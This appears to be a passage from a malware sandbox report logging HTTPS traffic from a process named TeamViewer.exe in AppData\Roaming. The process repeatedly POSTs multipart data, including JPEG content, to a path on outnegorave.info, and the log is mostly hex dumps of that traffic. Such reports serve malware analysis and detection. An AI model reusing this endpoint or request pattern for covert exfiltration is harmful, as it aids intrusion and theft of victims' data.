                                                                                                                                    2021-09-15 11:52:22 UTC1653OUTData Raw: 00 b4 94 52 d0 01 45 14 50 02 d0 29 28 cd 31 0e a2 92 96 98 05 14 52 d0 20 a5 a2 8c 53 10 b4 b4 94 53 10 1a 51 49 4a 28 01 45 25 28 a4 34 c4 14 b4 94 0a 40 38 53 85 36 96 a9 09 8b 45 25 2d 30 16 8a 28 a0 91 68 a2 8a 60 14 51 45 02 1c 29 69 a2 94 53 40 2d 2d 25 2d 32 42 96 92 94 53 01 68 a2 8a 62 16 8a 4a 5a 04 14 b4 94 b4 d0 0e a2 90 52 d3 24 29 45 14 53 01 68 a0 52 d3 10 94 94 b4 50 02 0e b4 fa 60 eb 4f a1 03 0a 0d 14 53 24 05 2d 20 a7 62 84 0c 50 29 d4 da 70 aa 44 b1 3b d2 d2 1e b4 e1 4c 04 14 ea 6d 28 a6 26 2d 14 51 40 80 52 d2 0a 75 31 09 4e a4 a2 98 31 d4 b4 d1 4b 4c 91 d9 a5 14 da 51 4d 09 8e 14 b4 da 70 a6 4b 0a 5a 4a 29 88 5a 29 29 68 00 a5 a4 a5 a0 05 a5 a6 d3 a8 13 0a 51 49 4b 40 85 a2 92 96 81 05 2d 14 53 00 a5 14 52 8a 04 c5 a0 52 52 8a 04 68
                                                                                                                                    Data Ascii: REP)(1R SSQIJ(E%(4@8S6E%-0(h`QE)iS@--%-2BShbJZR$)EShRP`OS$- bP)pD;Lm(&-Q@Ru1N1KLQMpKZJ)Z))hQIK@-SRRRh
                                                                                                                                    2021-09-15 11:52:22 UTC1669OUTData Raw: 36 96 81 0e 14 52 52 d5 08 51 4b 4d cd 2d 31 0e cd 2d 36 96 81 0e 14 a2 9b 4a 0d 52 64 b2 41 45 20 34 55 22 45 a5 a4 a3 34 c2 c2 e6 8c d2 0a 5a 2e 2b 0a 29 73 4c a5 cd 3b 85 87 e6 96 99 9a 5c d3 26 c3 85 2e 69 b9 a2 9d c2 c3 f3 46 69 b9 a3 77 b5 17 15 89 01 a5 cd 47 b8 fa d1 9f 7a 77 15 89 32 28 cd 47 9a 5c d1 71 58 7e 68 cd 37 34 66 9d c2 c3 a9 73 4d a3 34 5c 56 1d 9a 5c d3 33 46 69 dc 2c 3f 34 66 99 ba 93 75 17 0e 52 4c d1 9a 8f 75 1b a9 5c 39 49 37 52 6e a8 8b d3 4b d0 e4 35 02 62 d4 d2 f5 11 7a 69 6a 97 32 94 09 4b d3 0b d4 65 a9 85 aa 1c 8b 50 24 2f ef 4c 2d 4c 2d 4c 2d 50 e4 68 a2 3c b5 30 b5 34 b5 30 b5 66 e4 68 a2 38 9a 61 34 84 d2 54 36 5a 42 93 49 49 46 69 31 d8 43 45 06 9b 52 52 0c d1 49 49 4a e3 b1 43 1d e9 69 28 ae 53 ac 5a 28 a3 14 00 51 45
                                                                                                                                    Data Ascii: 6RRQKM-1-6JRdAE 4U"E4Z.+)sL;\&.iFiwGzw2(G\qX~h74fsM4\V\3Fi,?4fuRLu\9I7RnK5bzij2KeP$/L-L-L-Ph<040fh8a4T6ZBIIFi1CERRIIJCi(SZ(QE
                                                                                                                                    2021-09-15 11:52:22 UTC1685OUTData Raw: ae a1 67 ba 6d 22 4f b6 c2 39 f2 db 0b 28 fe 8d fa 7d 29 9e 20 f8 71 a8 d8 6e 9b 4a 63 7d 00 e7 60 18 95 47 d3 f8 bf 0e 7d ab a0 f0 8f 81 b4 33 6b 1d f5 cc bf da 32 1e a8 cb b5 23 6e ea 53 ae 47 70 df 95 20 3c ae 68 a4 82 56 8a 78 de 39 10 e1 91 d4 82 0f b8 34 ca e8 fe 21 22 47 e3 5b f4 8d 55 11 44 40 2a 8c 00 3c a4 ae 72 a8 41 56 f4 db 26 be ba 11 83 b5 07 2e de 82 aa 57 41 e1 7d b8 b9 07 af cb f9 73 53 27 65 a1 15 2a 2a 6b 9d ab d8 dc b3 d1 ad c2 6c b6 b3 12 6d 1c 92 9b 8f e3 55 f5 0f 0e 0b 85 61 1d ab 43 30 e8 55 08 fc c5 6e 8d ff 00 d9 b6 e2 2c 98 c6 77 e3 fb f9 ef f8 62 b6 f4 df 37 ec 29 e7 e7 76 4e dd dd 76 f6 fe b5 86 26 94 a8 61 d6 21 4b 5e c7 a3 0c 75 3a d3 f6 51 87 ba 78 b4 d1 3c 13 3c 52 a9 57 42 55 81 ec 69 95 b5 e3 1f 2f fe 12 8b df 2b 18 dc
                                                                                                                                    Data Ascii: gm"O9(}) qnJc}`G}3k2#nSGp <hVx94!"G[UD@*<rAV&.WA}sS'e**klmUaC0Un,wb7)vNv&a!K^u:Qx<<RWBUi/+
                                                                                                                                    2021-09-15 11:52:22 UTC1688OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 36 33 39 37 37 34 39 32 31 2d 2d 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------2639774921--
                                                                                                                                    2021-09-15 11:52:23 UTC1688INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:23 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=ee278f8e9c6333688ea0aab06f7a473cb11852bdefce738d80c4452aa3a96a82; expires=Thu, 15-Sep-2022 11:52:22 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=F2oZoc%2BZubre%2FOTjpyPri%2FXnzqwlntURsOEpt8RvVjIInl%2FdAXZTTPAokYXc78vX4Br32mqjVXLCV5b8ufVcKS59J7pETt7ijBH2OuF54ejr7Ek5NfhnnyLKJ8BQnpGxxhN8"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a603ef076940-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                    2021-09-15 11:52:23 UTC1689INData Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    2192.168.2.549759172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    2021-09-15 11:51:42 UTC170OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 88912
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------142932537
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    2021-09-15 11:51:42 UTC170OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 34 32 39 33 32 35 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------142932537Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                                                    2021-09-15 11:51:42 UTC170OUTData Raw: bd d9 05 bb ab 2e 28 c5 ff c4 26 3c 63 26 a0 ff 19 e6 28 79 50 4e 94 09 81 02 3c 3b 5e 8e 05 18 d1 ed 11 8c 06 87 d2 d8 dd 04 3b 85 19 5a 1e 56 7d e2 9e 04 9e ee a5 7d 68 11 2d 0c 5e f2 66 63 4b c1 95 f8 ef 84 9f bc fa 68 8c db 26 7c 0f 9b 21 fa a7 70 33 d6 1f 97 e1 63 b7 ce 51 99 1b b8 b1 a1 f1 67 ab f9 7b 78 d6 96 22 31 f3 ba 9d 6e ae
                                                                                                                                    Data Ascii: .(&<c&(yPN<;^;ZV}}h-^fcKh&|!p3cQg{x"1n
                                                                                                                                    2021-09-15 11:51:42 UTC170OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                    Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                                                    2021-09-15 11:51:42 UTC186OUTData Raw: c6 b2 8b e8 cc 5a 28 a2 bc c3 d5 0a 28 a4 a0 0f 7a 96 00 ff 00 32 70 df ce a0 19 07 07 a8 ab 86 a9 b1 fd eb ff 00 bc 6b e5 ea 25 b9 eb c5 92 29 af 18 d7 bf e4 60 d4 bf eb ea 5f fd 0c d7 b3 29 af 19 d7 bf e4 60 d4 bf eb ea 5f fd 0c d7 a1 96 7c 52 39 71 7b 22 85 2d 25 2d 7b 27 10 51 8a 28 a0 41 8a f4 3f 85 05 92 3d 65 a3 5d ec 04 44 2e 71 93 f3 f1 9a e0 20 8b ce 99 63 07 19 ef 5d 57 86 35 59 fc 38 b7 5f 67 48 e6 6b 8d 99 2e 0e 17 6e ef 43 fe d5 29 42 53 8e 85 46 49 3d 4f 4d fb 5e a3 ff 00 40 bf fc 98 5a 3e d7 a8 ff 00 d0 2f ff 00 26 16 b8 49 bc 67 ad 49 f7 24 86 1f f7 23 07 f9 e6 ba fb 89 6c 05 c4 a1 f5 5b d4 60 e7 2a ac d8 53 9e 83 8a e6 a9 4a 50 b5 cd e3 35 2d 86 5e 5a 59 6b 36 57 96 7a d4 71 c0 5a 50 54 19 54 b2 1d 8b 86 53 eb 5e 47 ae e9 13 68 ba 83 5b
                                                                                                                                    Data Ascii: Z((z2pk%)`_)`_|R9q{"-%-{'Q(A?=e]D.q c]W5Y8_gHk.nC)BSFI=OM^@Z>/&IgI$#l[`*SJP5-^ZYk6WzqZPTTS^Gh[
                                                                                                                                    2021-09-15 11:51:42 UTC202OUTData Raw: f6 f3 5b c4 d1 51 83 f8 64 72 c2 3c f1 8a 0c 46 bb 3b 1b 5d 32 79 83 46 14 b7 a5 4f 72 d6 36 d2 18 84 11 ee c6 79 02 b3 78 ef 7b 95 44 da 38 26 e3 cc e5 a1 c1 14 39 e0 13 4a 2d e6 3d 22 90 ff 00 c0 4d 76 32 c8 ce 31 07 90 9f f0 1a cf 9a db 50 93 a5 c2 fe 1c 56 91 c4 b7 ba b1 9c a8 72 ec ee 73 ff 00 63 9f bc 4c 3e b4 86 dd c7 de c0 fc 6b 4e 5d 3e f8 f2 d9 6f c6 ab 3d 9d c2 75 89 ab 68 d4 4f a9 84 94 97 42 af 91 ea c2 97 c9 51 d5 aa 56 8a 45 ea a4 7e 14 dd a4 75 15 a2 68 cd b6 37 cb 41 ea 69 70 a3 f8 45 14 b4 ec 2b b0 c8 ec 00 a5 c9 f5 a4 a5 a2 c4 87 3e b4 a2 92 96 81 0b 45 14 52 01 45 28 a4 a5 14 99 2c 70 ad 1b 2c 64 62 b3 85 5f b2 3c 8a c6 aa f7 4d b0 ef df 3a d5 38 d3 49 ff 00 66 bc fa ef fd 63 7d 6b bd ce 34 96 3f ec d7 01 74 7f 78 df 5a e5 c0 6f 23 d3
                                                                                                                                    Data Ascii: [Qdr<F;]2yFOr6yx{D8&9J-="Mv21PVrscL>kN]>o=uhOBQVE~uh7AipE+>ERE(,p,db_<M:8Ifc}k4?txZo#
                                                                                                                                    2021-09-15 11:51:42 UTC218OUTData Raw: cd cd bf fb 8d fc eb ba cd 70 be 31 ff 00 8f ab 7f f7 0f f3 ab a5 b9 33 dd 1c 3e 68 a2 92 b1 3a c5 a2 8a 28 00 14 b4 51 40 05 2d 25 2d 31 07 7a 28 a2 80 0c d2 d2 52 d0 02 d1 49 4b 4c 42 51 4a 69 28 00 a2 8a 28 00 a2 8a 28 01 69 28 a5 a0 02 8a 28 a0 05 a0 52 51 9a 62 1d 45 25 2d 30 0a 28 a5 a0 41 4b 45 18 a6 21 69 69 28 a6 20 34 a2 92 94 50 02 8a 4a 51 48 69 88 29 69 28 14 80 70 a7 0a 6d 2d 52 13 16 8a 4a 5a 60 2d 14 51 41 22 d1 45 14 c0 28 a2 8a 04 38 52 d3 45 28 a6 80 5a 5a 4a 5a 64 85 2d 25 28 a6 02 d1 45 14 c4 2d 14 94 b4 08 29 69 29 69 a0 1d 45 20 a5 a6 48 52 8a 28 a6 02 d1 40 a5 a6 21 29 29 68 a0 04 1d 69 f4 c1 d6 9f 42 06 14 1a 28 a6 48 0a 5a 41 4e c5 08 18 a0 53 a9 b4 e1 54 89 62 77 a5 a4 3d 69 c2 98 08 29 d4 da 51 4c 4c 5a 28 a2 81 00 a5 a4 14 ea
                                                                                                                                    Data Ascii: p13>h:(Q@-%-1z(RIKLBQJi(((i((RQbE%-0(AKE!ii( 4PJQHi)i(pm-RJZ`-QA"E(8RE(ZZJZd-%(E-)i)iE HR(@!))hiB(HZANSTbw=i)QLLZ(
                                                                                                                                    2021-09-15 11:51:42 UTC234OUTData Raw: d1 40 09 b9 7f bc 3f 3a 37 2f f7 87 e7 4b 45 00 26 e5 fe f0 fc e8 dc bf de 1f 9d 2d 14 00 9b 97 fb c3 f3 a3 72 ff 00 78 7e 74 b4 50 02 6e 5f ef 0f ce 8d cb fd e1 f9 d2 d1 40 09 b9 7f bc 3f 3a 37 2f f7 87 e7 4b 45 00 26 e5 fe f0 fc eb cb 7e 2c 10 75 8b 1c 1c ff 00 a3 9f fd 08 d7 a9 d7 96 7c 57 ff 00 90 cd 9f fd 70 3f ce b5 a5 bb 32 ab b2 38 61 4b 48 29 6b a1 18 8b 45 14 94 c4 2d 14 51 40 85 a2 92 96 98 0b 45 25 2d 00 14 66 8a 28 10 b4 51 49 4c 07 51 9a 4a 29 80 b4 52 51 40 85 a2 92 8a 00 5a 5a 6d 2d 00 2d 2d 36 96 98 85 a2 92 96 80 16 96 9a 29 69 dc 42 d2 d3 68 a0 07 66 8c d3 69 69 88 5a 5a 4a 51 4c 42 d1 45 14 00 b4 52 51 40 85 a2 92 8a 60 2d 14 51 40 0b 4b 4d a5 a6 84 2f 6a 5a 4a 29 88 75 2d 34 52 d3 10 b4 52 1a 28 b8 0b 4b 49 45 02 1d 4b 4d a5 a6 2b 0e
                                                                                                                                    Data Ascii: @?:7/KE&-rx~tPn_@?:7/KE&~,u|Wp?28aKH)kE-Q@E%-f(QILQJ)RQ@ZZm---6)iBhfiiZZJQLBERQ@`-Q@KM/jZJ)u-4RR(KIEKM+
                                                                                                                                    2021-09-15 11:51:42 UTC250OUTData Raw: 67 7f 45 70 1f f0 b4 2d 3f e8 17 3f fd fc 1f e1 47 fc 2d 0b 4f fa 05 cf ff 00 7f 07 f8 51 ec e5 fd 34 1e d2 3f d2 67 7f 45 70 1f f0 b4 2d 3f e8 17 3f fd fc 1f e1 47 fc 2d 0b 4f fa 05 cf ff 00 7f 07 f8 51 ec e5 fd 34 1e d2 3f d2 67 7f 45 70 1f f0 b4 2d 3f e8 17 3f fd fc 1f e1 4b ff 00 0b 42 d3 fe 81 73 ff 00 df c1 fe 14 7b 39 7f 4d 07 b4 8f f4 99 df 51 5c 0f fc 2d 0b 4f fa 05 cf ff 00 7f 07 f8 51 ff 00 0b 42 d3 fe 81 73 ff 00 df c1 fe 14 7b 39 7f 4d 07 b4 8f f4 99 df 51 5c 07 fc 2d 0b 4f fa 05 cf ff 00 7f 07 f8 52 ff 00 c2 d0 b4 ff 00 a0 5c ff 00 f7 f0 7f 85 1e ce 5f d3 41 ed 23 fd 26 77 d4 57 03 ff 00 0b 42 d3 fe 81 73 ff 00 df c1 fe 14 9f f0 b4 2d 3f e8 19 3f fd fc 1f e1 47 b3 97 f4 d0 7b 48 ff 00 49 9d fd 15 c0 ff 00 c2 d0 b4 ff 00 a0 5c ff 00 f7 f0 7f
                                                                                                                                    Data Ascii: gEp-??G-OQ4?gEp-??G-OQ4?gEp-??KBs{9MQ\-OQBs{9MQ\-OR\_A#&wWBs-??G{HI\
                                                                                                                                    2021-09-15 11:51:42 UTC257OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 34 32 39 33 32 35 33 37 2d 2d 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------142932537--
                                                                                                                                    2021-09-15 11:51:55 UTC257INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:51:55 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=3cec0ed4240dd48cf763b5fd88d8539b6fa5763293551ee46a1b0cca365efb17; expires=Thu, 15-Sep-2022 11:51:42 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qVy0W0xqCeHtRgT9OBrUgIjRVAgozp1JdX4n9u2yJ0uEbQUWFKuNZkL9wu7g739XJ5VtW3lSwbTr6Fy9%2FHlw8%2BYylqDplqTdP%2BseLAT1I2hvt7Wc1Zoq7Hd3cPk7hQ5teB26"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a50bb9836943-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                    2021-09-15 11:51:55 UTC258INData Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    20192.168.2.549811172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    2021-09-15 11:52:23 UTC1689OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 84974
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------428629968
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    2021-09-15 11:52:23 UTC1689OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 34 32 38 36 32 39 39 36 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------428629968Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                                                    2021-09-15 11:52:23 UTC1689OUTData Raw: b1 d9 05 bb ab 2e 28 c5 ff c4 26 3c 63 26 a0 ff 19 e6 28 79 50 4e 94 09 81 02 3c 3b 5e 8e 05 18 d1 ed 11 8c 06 87 d2 d8 4f 14 3b 85 19 5a 1e 56 7d e2 9e 04 9e ee a5 7d 68 11 2d 0c 5e f2 66 63 4b c1 95 f8 ef 84 9d bb fb 0f bd 80 17 0b 2b 94 2b f4 b7 66 1d b3 24 dd d1 5b ac c5 47 d8 09 b3 88 c4 ba 2e f6 a6 3a 2c 9c 8f 72 49 a7 8c 9e 60 9f bf d3 6c a7 bd c1 c6 2b ca 0d 24 15
                                                                                                                                    Data Ascii: .(&<c&(yPN<;^O;ZV}}h-^fcK++f$[G.:,rI`l+$
                                                                                                                                    2021-09-15 11:52:23 UTC1689OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                    Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                                                    2021-09-15 11:52:23 UTC1705OUTData Raw: 15 06 55 2c 87 62 e1 94 fa d7 91 eb ba 44 da 2e a0 d6 d2 c8 92 a7 58 e5 8c e5 5d 7d 7d 8f a8 ff 00 f5 d7 ad f9 da 77 fd 06 2f ff 00 ef b6 ff 00 e2 6b 96 f8 a6 54 db 68 85 1d 9d 4a 4b 86 6e ac 31 1f 26 9d 29 34 ec 2a 89 5a e7 9e 52 53 b0 29 31 5d 16 30 12 8a 5c 51 83 40 1b 9e 0b ff 00 91 bb 4e ff 00 ae bf d0 d7 b6 d7 89 78 2f fe 46 ed 37 fe ba ff 00 43 5e b9 24 22 e7 56 99 25 92 70 89 04 65 55 26 74 19 2d 26 4f ca 47 a0 fc ab 1a 8a f2 d4 d6 0e cb 43 46 aa de b6 c1 0b 95 66 55 93 9d aa 5b f8 58 74 1f 5a 85 6c ec de 57 89 2e 2e 5a 48 f1 bd 45 e4 b9 5c f4 cf cd 4f fe cd b7 ff 00 9e 97 7f f8 17 2f ff 00 15 59 da 3d ff 00 0f f8 25 de 5d bf 1f f8 07 9c f8 e7 43 b5 89 5f 55 b2 57 88 16 1e 6c 6d 13 28 24 9e a3 23 f4 ae 26 bd 4f c6 6e d2 7c 3d b7 79 18 b3 b0 80 b3
                                                                                                                                    Data Ascii: U,bD.X]}}w/kThJKn1&)4*ZRS)1]0\Q@Nx/F7C^$"V%peU&t-&OGCFfU[XtZlW..ZHE\O/Y=%]C_UWlm($#&On|=y
                                                                                                                                    2021-09-15 11:52:23 UTC1721OUTData Raw: 8f fb 35 c0 5d 1f de 37 d6 b9 70 1b c8 f4 f3 07 f0 1d 45 b7 fc 8a b1 ff 00 9e f5 90 f5 ad 01 ff 00 8a 52 2f f3 de b1 9d 8e 6a a8 2d 65 ea 61 8c 7a 47 d0 63 12 3a 1a 03 b0 e8 c6 93 39 a4 ae bb 1e 67 33 24 13 b8 ef 9a 77 9e 0f de 40 6a 1a 29 72 a2 94 da 25 3e 43 7d e4 c5 21 b6 81 ba 1c 54 74 51 67 d1 8d 55 7d 41 b4 f5 3f 75 85 44 da 7c 83 a7 35 36 4f 50 6a 45 91 c7 f1 1a 2f 24 5a 9a 33 da d6 55 ea a6 a3 31 b0 ea 0d 6c 09 5b b8 14 ed c8 7e f2 03 4f da 35 d0 d1 6b d4 c3 20 8e c6 92 b6 cc 36 ef d5 71 4c 36 10 b7 dd 6c 53 f6 a8 76 66 3d 15 a6 da 59 fe 16 06 a1 7d 3e 65 e8 b9 a6 aa 47 b8 59 94 e8 a9 9a da 55 ea 87 f2 a8 8a 30 ea 0d 5a 69 88 4a 28 c5 14 c0 29 69 28 a0 43 a9 73 4d a5 14 08 75 4f 7c 7f e2 9a 6f fa ea 2a b8 a9 af cf fc 53 4c 3f e9 b0 ac 31 1b 23 7c
                                                                                                                                    Data Ascii: 5]7pER/j-eazGc:9g3$w@j)r%>C}!TtQgU}A?uD|56OPjE/$Z3U1l[~O5k 6qL6lSvf=Y}>eGYU0ZiJ()i(CsMuO|o*SL?1#|
                                                                                                                                    2021-09-15 11:52:23 UTC1737OUTData Raw: a2 92 94 50 02 8a 4a 51 48 69 88 29 69 28 14 80 70 a7 0a 6d 2d 52 13 16 8a 4a 5a 60 2d 14 51 41 22 d1 45 14 c0 28 a2 8a 04 38 52 d3 45 28 a6 80 5a 5a 4a 5a 64 85 2d 25 28 a6 02 d1 45 14 c4 2d 14 94 b4 08 29 69 29 69 a0 1d 45 20 a5 a6 48 52 8a 28 a6 02 d1 40 a5 a6 21 29 29 68 a0 04 1d 69 f4 c1 d6 9f 42 06 14 1a 28 a6 48 0a 5a 41 4e c5 08 18 a0 53 a9 b4 e1 54 89 62 77 a5 a4 3d 69 c2 98 08 29 d4 da 51 4c 4c 5a 28 a2 81 00 a5 a4 14 ea 62 12 9d 49 45 30 63 a9 69 a2 96 99 23 b3 4a 29 b4 a2 9a 13 1c 29 69 b4 e1 4c 96 14 b4 94 53 10 b4 52 52 d0 01 4b 49 4b 40 0b 4b 4d a7 50 26 14 a2 92 96 81 0b 45 25 2d 02 0a 5a 28 a6 01 4a 28 a5 14 09 8b 40 a4 a5 14 08 d0 d2 47 ef dc fa 21 aa c7 a9 fa d5 ad 27 fd 74 9f ee 9a aa 7a 9f ad 64 be 36 13 f8 50 51 45 15 a1 90 52 d2 52
                                                                                                                                    Data Ascii: PJQHi)i(pm-RJZ`-QA"E(8RE(ZZJZd-%(E-)i)iE HR(@!))hiB(HZANSTbw=i)QLLZ(bIE0ci#J))iLSRRKIK@KMP&E%-Z(J(@G!'tzd6PQERR
